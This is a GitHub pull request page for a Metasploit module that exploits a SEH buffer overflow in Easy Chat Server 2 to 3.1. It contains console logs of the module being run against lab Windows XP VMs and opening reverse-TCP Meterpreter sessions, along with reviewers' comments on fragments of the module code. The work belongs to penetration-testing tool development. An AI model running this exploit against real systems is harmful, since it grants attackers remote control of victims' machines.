Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Easy Chat Server 2 to 3.1 - Buffer overflow (SEH) exploit #8586

Merged
merged 5 commits into from Jul 14, 2017
Merged

Easy Chat Server 2 to 3.1 - Buffer overflow (SEH) exploit #8586

merged 5 commits into from Jul 14, 2017

Conversation

Mzack9999
Copy link
Contributor

This module exploits a buffer overflow vulnerability of Easy Chat Server. Versions from 2 to 3.1 seem to be affected.

Verification

Tested on: Windows XP Sp3 English
Vulnerable application: http://echatserver.com/ecssetup.exe

Example output:

marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
 
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
 
meterpreter > sysinfo
Computer    	: MM-8B040C5B05D9
OS          	: Windows XP (Build 2600, Service Pack 3).
Architecture	: x86
System Language : en_US
Domain      	: WORKGROUP
Logged On Users : 2
Meterpreter 	: x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
 
[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(easychatserver_seh) >

wvu
wvu reviewed Jun 20, 2017
View reviewed changes
modules/exploits/windows/http/easychatserver_seh.rb Outdated
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
#include Msf::Exploit::Remote::HttpClient
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I used the Msf::Exploit::Remote::Tcp with direct socket connection, because with the HttpClient somehow the payload opcodes got a wrong encoding. Would it be better to change the implementation to use send_request_cgi with var_post?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You should use the HTTP mixin if possible so you can get all the evasions and stuff.

@pbarry-r7 pbarry-r7 self-assigned this Jul 14, 2017
@pbarry-r7
Copy link
Contributor

Verified against my XP SP3 x86 VM:

$ ./msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set rhost 10.0.2.15
rhost => 10.0.2.15
msf exploit(easychatserver_seh) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Sending stage (957487 bytes) to 10.0.2.15
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.15:1056) at 2017-07-14 15:12:35 -0500

meterpreter > getuid
Server username: PB-WINXP-VM\PB
meterpreter > sysinfo
Computer        : PB-WINXP-VM
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Thanks for the submission, @Mzack9999!

@pbarry-r7 pbarry-r7 merged commit 66eb89e into rapid7:master Jul 14, 2017
pbarry-r7 added a commit that referenced this pull request Jul 14, 2017
@pbarry-r7
Land #8586, Easy Chat Server 2 to 3.1 - Buffer overflow (SEH) exploit
9775df1
@pbarry-r7
Copy link
Contributor

pbarry-r7 commented Jul 14, 2017
edited by alrosenthal-r7

Release Notes

The exploits/windows/http/easychatserver_seh module has been added to the framework. This new module exploits vulnerable versions of Easy Chat Server, a Windows web-based chat application, to gain remote code execution.

wvu
wvu reviewed Jul 14, 2017
View reviewed changes
modules/exploits/windows/http/easychatserver_seh.rb
'ENCODER' => 'x86/alpha_mixed'
},
'DisclosureDate' => 'Oct 09 2017',
'DefaultTarget' => 0))
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think you want to register TARGETURI.

wvu
wvu reviewed Jul 14, 2017
View reviewed changes
modules/exploits/windows/http/easychatserver_seh.rb
sploit << rand_text_alpha_upper(200)

res = send_request_cgi({
'uri' => normalize_uri(URI,'registresult.htm'),
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This should be target_uri.path instead of URI...

wvu
wvu reviewed Jul 14, 2017
View reviewed changes
modules/exploits/windows/http/easychatserver_seh.rb
'submit1' => 'Register'
}
})
handler
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is redundant.

@Mzack9999 Mzack9999 deleted the easychatserver_seh branch March 16, 2018 21:26
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wvu wvu wvu left review comments

Assignees

@pbarry-r7 pbarry-r7

Labels
feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@Mzack9999 @pbarry-r7 @wvu @dmohanty-r7 @alrosenthal-r7